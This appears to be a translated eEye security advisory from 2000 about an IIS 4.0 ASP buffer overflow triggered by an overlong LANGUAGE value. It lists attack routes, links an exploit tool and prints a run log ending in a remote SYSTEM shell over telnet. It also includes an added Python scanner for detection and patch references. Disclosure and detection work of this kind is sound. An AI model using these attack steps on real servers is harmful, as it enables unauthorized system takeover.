Release date: 2000-11-6  Updated: 2000-11-6
Affected systems:
Microsoft IIS 4.0 SP6
- Microsoft Windows NT 4.0
Unaffected systems:
Microsoft IIS 5.0
- Microsoft Windows 2000
Description:
A buffer overflow vulnerability exists in the .ASP ISAPI file-extension handling of Microsoft IIS 4.0 that can be used to obtain SYSTEM-level access.
The overflow occurs in the handling of the "LANGUAGE" variable in JavaScript: supplying a very long string as the "LANGUAGE" value causes IIS (inetinfo.exe) to overflow. Below is an example .asp file:
...
..
If [buffer] contains 2220 or more characters, the overflow occurs. This may allow an attacker to obtain SYSTEM-level privileges.
This is a local vulnerability: the attacker must supply a malicious .asp file to launch the attack. However, as long as the attacker can upload an .asp file, the attack can also be launched remotely. For example:
1. On sites that offer virtual hosting or allow .asp uploads, an attacker only needs to upload a malicious .asp file to obtain SYSTEM privileges remotely.
2. Some guestbook or BBS programs allow users to enter JavaScript. An attacker can enter JavaScript statements containing malicious code in a message and compromise the system remotely.
3. Using the IIS Unicode vulnerability, an attacker can remotely create a malicious .asp file on the affected system and launch the overflow attack.
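As an added, defender-side example (not part of the eEye advisory or its test code), the following Python scanner checks uploaded .asp content or user-submitted script for a LANGUAGE attribute whose value reaches the 2220-character length given above. The attribute forms it looks for (`<%@ LANGUAGE=... %>` directives and `<SCRIPT LANGUAGE=...>` tags) are assumptions, since the advisory's sample .asp file is elided.

```python
import re

# Threshold from the advisory: a LANGUAGE value of 2220 or more characters
# overflows the ASP ISAPI extension in IIS 4.0.
OVERFLOW_LENGTH = 2220

# Assumed places a LANGUAGE value appears in an .asp file: a <%@ ... %>
# page directive and a <SCRIPT ...> tag (server-side or client-side).
_DIRECTIVE = re.compile(r"<%@(.*?)%>", re.DOTALL)
_SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
# LANGUAGE=value with double quotes, single quotes, or no quotes at all.
_LANGUAGE_ATTR = re.compile(
    r"""language\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>%]*))""", re.IGNORECASE
)


def language_values(asp_source):
    """Return every LANGUAGE attribute value found in directives and script tags."""
    values = []
    for pattern in (_DIRECTIVE, _SCRIPT_TAG):
        for tag in pattern.finditer(asp_source):
            for attr in _LANGUAGE_ATTR.finditer(tag.group(1)):
                # Exactly one of the three quoting alternatives matched.
                values.append(next(v for v in attr.groups() if v is not None))
    return values


def find_overflow_candidates(asp_source, threshold=OVERFLOW_LENGTH):
    """Return (length, first 16 chars) for each LANGUAGE value at or above threshold."""
    return [(len(v), v[:16]) for v in language_values(asp_source)
            if len(v) >= threshold]


# Constructed samples: a normal page and one carrying a 2220-character LANGUAGE value.
BENIGN_ASP = (
    '<%@ LANGUAGE="VBScript" %>\n'
    '<SCRIPT LANGUAGE=JScript RUNAT=Server>\n'
    'Response.Write("hello")\n'
    '</SCRIPT>\n'
)
MALICIOUS_ASP = '<SCRIPT LANGUAGE="' + "A" * OVERFLOW_LENGTH + '" RUNAT=Server></SCRIPT>'

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_ASP), ("malicious", MALICIOUS_ASP)):
        hits = find_overflow_candidates(src)
        print(f"{name}: {'FLAGGED ' + str(hits) if hits else 'clean'}")
```

The same check can be run over guestbook or BBS input before it is stored, since the second vector above delivers the payload through user-entered script rather than an uploaded file.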
<* Source: eEye Digital Security (info@eEye.com)
URL: http://www.eEye.com
*>
Test program:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
eEye.com has provided test code:
http://www.eEye.com/html/advisories/IISHack1.5.zip
Test example:
C:\we are still hiring good programmers> iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
Recommendation:
Vendor patch:
Microsoft has fixed this problem in several hotfixes, and the latest W3SVC.DLL also fixes this vulnerability. Installing any one of the following hotfixes fixes it:
MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability
MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability
MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability
Microsoft security bulletin address:
http://www.microsoft.com/technet/security/current.asp